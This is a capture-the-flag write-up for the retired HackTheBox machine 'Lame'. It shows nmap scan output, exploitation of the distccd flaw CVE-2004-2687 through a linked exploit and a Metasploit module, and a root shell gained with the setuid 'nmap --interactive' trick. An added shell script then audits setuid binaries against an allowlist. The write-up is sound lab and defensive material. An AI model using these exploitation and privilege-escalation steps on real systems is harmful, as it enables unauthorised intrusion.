HackTheBox – Lame
difficulty: easy
status: retired
platform: linux
ip: 10.10.10.3
URI: https://www.hackthebox.eu/home/machines/profile/1
The initial aim is to collect as much information about the target host as possible.
nmap's --script vuln option lists the common vulnerabilities that nmap can detect. Several services are open, and distccd has a public vulnerability available.
nmap scan results

Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-31 07:40 GMT
Nmap scan report for 10.10.10.3
Host is up (0.013s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_sslv2-drown:
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| vulners:
|   cpe:/a:openbsd:openssh:4.7p1:
|       PACKETSTORM:101052  7.8  https://vulners.com/packetstorm/PACKETSTORM:101052  *EXPLOIT*
|       CVE-2010-4478       7.5  https://vulners.com/cve/CVE-2010-4478
|       CVE-2008-1657       6.5  https://vulners.com/cve/CVE-2008-1657
|       SSV:60656           5.0  https://vulners.com/seebug/SSV:60656  *EXPLOIT*
|       CVE-2017-15906      5.0  https://vulners.com/cve/CVE-2017-15906
|       CVE-2010-5107       5.0  https://vulners.com/cve/CVE-2010-5107
|       CVE-2010-4755       4.0  https://vulners.com/cve/CVE-2010-4755
|       CVE-2012-0814       3.5  https://vulners.com/cve/CVE-2012-0814
|       CVE-2011-5000       3.5  https://vulners.com/cve/CVE-2011-5000
|       CVE-2011-4327       2.1  https://vulners.com/cve/CVE-2011-4327
|_      CVE-2008-3259       1.2  https://vulners.com/cve/CVE-2008-3259
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
| distcc-cve2004-2687:
|   VULNERABLE:
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|       Allows executing of arbitrary commands on systems running distccd 3.1 and
|       earlier. The vulnerability is the consequence of weak service configuration.
|
|     Disclosure date: 2002-02-01
|     Extra information:
|
|     uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
|     References:
|       https://nvd.nist.gov/vuln/detail/CVE-2004-2687
|       https://distcc.github.io/security.html
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 179.11 second
Since distccd is vulnerable and a public exploit is available, this looks like a good path forward. There is also an NSE script for it, which sadly didn't work for me.
Exploit: https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855 Metasploit: exploit/unix/misc/distcc_exec
This gives a /bin/sh session as the daemon user. The user flag can be read from /home/makis/user.txt. Basic privilege escalation is enough to reach root.
Upgrade the shell to an interactive TTY first:
python -c "import pty;pty.spawn('/bin/bash')"
Find SUID binaries:
find / -type f -perm -u=s 2>/dev/null
nmap has the SUID bit set. Its interactive mode can be used to get a shell as root and read the root flag:
/usr/bin/nmap --interactive
!sh
cat /root/root.txt
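From the defender's side, the finding above is a setuid binary that has no business being setuid. The following POSIX shell audit is an added example, not part of the original writeup: it feeds the output of the same find command into a check against an allowlist of binaries expected to be setuid on the host, so that a setuid /usr/bin/nmap is reported. The allowlist contents are a constructed sample and would be built from a known-good install of the same distribution release.

```shell
#!/bin/sh
# Added example, not part of the original writeup: report setuid binaries that
# are not on an allowlist, e.g. a setuid nmap like the one found on this box.

# Constructed sample allowlist. Build the real one from a known-good install of
# the same release and keep it outside the audited host.
ALLOWED_SUID='/usr/bin/passwd
/usr/bin/sudo
/bin/su
/bin/mount
/bin/umount
/bin/ping'

# Enumerate setuid files on the live host (the same find used in the writeup).
collect_suid() {
    find / -type f -perm -u=s 2>/dev/null
}

# Read one path per line on stdin and print every path that is not allowlisted.
# Returns 0 when every setuid binary is expected, 1 when at least one is not.
audit_suid() {
    unexpected=0
    while IFS= read -r path; do
        [ -z "$path" ] && continue
        # -F literal match, -x whole line, -q exit status only
        if printf '%s\n' "$ALLOWED_SUID" | grep -Fxq -- "$path"; then
            continue
        fi
        printf 'unexpected setuid binary: %s\n' "$path"
        unexpected=1
    done
    return "$unexpected"
}

# Only touch the live filesystem when explicitly asked, so that sourcing this
# file to reuse audit_suid has no side effects.
if [ "${1:-}" = "--live" ]; then
    collect_suid | audit_suid
fi
```

Run with `--live` on the host to audit it; a non-zero exit status means at least one unexpected setuid binary was found, which is the condition worth alerting on.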